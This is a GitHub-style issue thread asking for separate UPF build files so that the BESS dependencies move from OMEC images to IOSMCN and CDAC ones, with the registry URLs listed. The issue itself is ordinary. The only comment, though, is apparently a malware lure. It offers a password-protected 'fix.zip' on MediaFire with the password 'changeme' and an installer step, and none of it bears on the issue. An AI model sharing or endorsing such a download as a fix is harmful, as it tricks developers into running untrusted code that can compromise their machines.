### ISSUE TITLE
Separate build files to be created in UPF to change BESS dependencies

### ISSUE THREAD

**Issue by JayaramRCDAC** [5GC-DEV/upf-cdac#5]
**Issue/Feature Description:**
The UPF build process currently uses BESS dependencies and prerequisites from OMEC. To align with our project requirements, we need to create separate build files in UPF to switch the dependencies and prerequisites to those provided by IOSMCN and CDAC.

**Why this issue to fixed / feature is needed(give scenarios or use cases):**

1. Alignment with Project Requirements: The current setup uses OMEC-specific dependencies that do not align with our project's focus on IOSMCN and CDAC platforms. Switching to the required dependencies ensures compatibility and compliance with project goals.
2. Improved Maintenance: Separate build files will make it easier to manage and update the dependencies specific to IOSMCN and CDAC without affecting the original OMEC setup, leading to better maintainability and flexibility.
3. Environment Consistency: Ensures that all development and deployment environments use the same set of dependencies and prerequisites, reducing discrepancies and potential conflicts.

**How to reproduce, in case of a bug:**
1. Attempt to build UPF using the current setup.
2. Observe the use of OMEC-specific dependencies in the logs and configurations.
3. Identify errors or incompatibilities related to the use of OMEC-specific dependencies when the intention is to use IOSMCN or CDAC dependencies.

**Other Notes /  Environment Information: (Please give the env information, log link or any useful information for this issue)**
Use below mentioned repositories for Bess:
- **OMEC**: registry.aetherproject.org/sdcore/bess_build:latest
- **IOSMCN**: ghcr.io/ios-mcn-core/bess_build:latest
- **CDAC**: docker.io/cdac5gc/bess_build:latest:latest

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
